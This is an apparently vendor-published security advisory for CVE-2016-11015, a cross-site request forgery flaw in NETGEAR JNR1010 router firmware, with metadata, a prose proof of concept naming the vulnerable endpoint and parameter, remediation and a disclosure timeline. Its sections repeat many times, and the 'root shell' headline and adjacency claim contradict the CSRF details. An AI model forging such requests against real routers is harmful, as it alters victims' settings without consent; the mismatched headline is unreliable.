CVE-2016-11015: CSRF in NETGEAR JNR1010 Routers

01/Description

What this actually is.

Technical background, root cause, and affected surface.

A Cross-site request forgery vulnerability was identified on NETGEAR JNR1010 devices before 1.0.0.32 allow cgibin/webprocCSRFviathe: InternetGatewayDevice. X_TWSZCOM_URL_Filter.BlackList.1.URL parameter. This vulnerability is due to insufficient CSRF protections for the web UI on an affected device.

Vendor: NetGear
Affected Product: JNR1010_firmware
CVE: CVE-2016-11015
Securin ID: 2016-CSW-01-1016
Status: Fixed
Date: October 28, 2015
Severity: Medium
CVSS Score: 6.5
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
CWE: CWE-352

02/Proof of Concept

From one request
to root shell.

Reproduced in a sandboxed environment. Requires only LAN or WiFi adjacency.

VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

ScopeUnchanged

ImpactC:N / I:H / A:N

SeverityMedium

We created a forged request by changing the value of any variable. In InternetGatewayDevice.X_TWSZ-COM_URL_Filter.BlackList.1 variable in the URL http://router-ip/cgi-bin/webproc was sent to the victim by forcing him/her to click on the malicious link generated by an attacker. With different sessions, it allows the attacker to change the settings of the victim’s router.

PoC · Exploitation Steps▲ trigger

01Figure 01: Blocked site keywords before the CSRF request was sent to the victim.02Figure 02: CSRF Request is created by changing the Blocklist URL variable.03Figure 03: CSRF request is successfully submitted in the victim’s browser.

Note: Similarly, we can manipulate any request and can force the victim to access the link generated by the attacker to make changes to the router settings without the victim’s knowledge.

03/Impact

What an attacker does to you.

Post-exploitation outcomes mapped to CVSS impact metrics.

An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user.

04/Remediation

Fix it. In this order.

A runbook, not a checklist. Sequence matters — assume compromise before you act.

Download the latest updated firmware and update it as per vendor advisory.

Securin advisory — For coordinated remediation support or threat-actor briefings related to CVE-2016-11015, contact disclose@securin.io

05/Disclosure Timeline

Vendors moved in days.
Attackers in hours.

Reconstructed from vendor advisories, CISA bulletins, and Securin research records.

Oct 28, 2015

Discovered vulnerability in Netgear Router Firmware Version 1.0.0.24

Oct 28, 2015

Reported to vendor

Nov 03, 2015

Netgear’s technical team address the issue after follow-up

Dec 13, 2015

Vulnerability got fixed

Dec 30, 2015

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Disclosed 63 days after discovery

06/References

Cite, verify, go deeper.

Primary sources — NVD, CISA KEV, and machine-readable IoC feed.

NVD

NVD — CVE-2016-11015

nvd.nist.gov/vuln/detail/CVE-2016-11015 →

SEC

Securin VI — Full Technical Analysis

vi.securin.io →

01/Description

What this actually is.

Technical background, root cause, and affected surface.

Vendor: NetGear
Affected Product: JNR1010_firmware
CVE: CVE-2016-11015
Securin ID: 2016-CSW-01-1016
Status: Fixed
Date: October 28, 2015
Severity: Medium
CVSS Score: 6.5
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
CWE: CWE-352

02/Proof of Concept

From one request
to root shell.

Reproduced in a sandboxed environment. Requires only LAN or WiFi adjacency.

VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

ScopeUnchanged

ImpactC:N / I:H / A:N

SeverityMedium

PoC · Exploitation Steps▲ trigger

Note: Similarly, we can manipulate any request and can force the victim to access the link generated by the attacker to make changes to the router settings without the victim’s knowledge.

03/Impact

What an attacker does to you.

Post-exploitation outcomes mapped to CVSS impact metrics.

04/Remediation

Fix it. In this order.

A runbook, not a checklist. Sequence matters — assume compromise before you act.

Download the latest updated firmware and update it as per vendor advisory.

Securin advisory — For coordinated remediation support or threat-actor briefings related to CVE-2016-11015, contact disclose@securin.io

05/Disclosure Timeline

Vendors moved in days.
Attackers in hours.

Reconstructed from vendor advisories, CISA bulletins, and Securin research records.

Oct 28, 2015

Discovered vulnerability in Netgear Router Firmware Version 1.0.0.24

Oct 28, 2015

Reported to vendor

Nov 03, 2015

Netgear’s technical team address the issue after follow-up

Dec 13, 2015

Vulnerability got fixed

Dec 30, 2015

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Disclosed 63 days after discovery

06/References

Cite, verify, go deeper.

Primary sources — NVD, CISA KEV, and machine-readable IoC feed.

NVD

NVD — CVE-2016-11015

nvd.nist.gov/vuln/detail/CVE-2016-11015 →

SEC

Securin VI — Full Technical Analysis

vi.securin.io →

Cross-Site Request Forgery in Netgear Router

What this actually is.

From one request
to root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.
Attackers in hours.

Discovered vulnerability in Netgear Router Firmware Version 1.0.0.24

Reported to vendor

Netgear’s technical team address the issue after follow-up

Vulnerability got fixed

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Cite, verify, go deeper.

NVD — CVE-2016-11015

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

Cross-Site Request Forgery in Netgear Router

What this actually is.

From one request
to root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.
Attackers in hours.

Discovered vulnerability in Netgear Router Firmware Version 1.0.0.24

Reported to vendor

Netgear’s technical team address the issue after follow-up

Vulnerability got fixed

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Cite, verify, go deeper.

NVD — CVE-2016-11015

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

Cross-Site Request Forgery in Netgear Router

What this actually is.

From one requestto root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.Attackers in hours.

Discovered vulnerability in Netgear Router Firmware Version 1.0.0.24

Reported to vendor

Netgear’s technical team address the issue after follow-up

Vulnerability got fixed

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Cite, verify, go deeper.

NVD — CVE-2016-11015

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

Cross-Site Request Forgery in Netgear Router

What this actually is.

From one requestto root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.Attackers in hours.

Discovered vulnerability in Netgear Router Firmware Version 1.0.0.24

Reported to vendor

Netgear’s technical team address the issue after follow-up

Vulnerability got fixed

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Cite, verify, go deeper.

NVD — CVE-2016-11015

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

From one request
to root shell.

Vendors moved in days.
Attackers in hours.

From one request
to root shell.

Vendors moved in days.
Attackers in hours.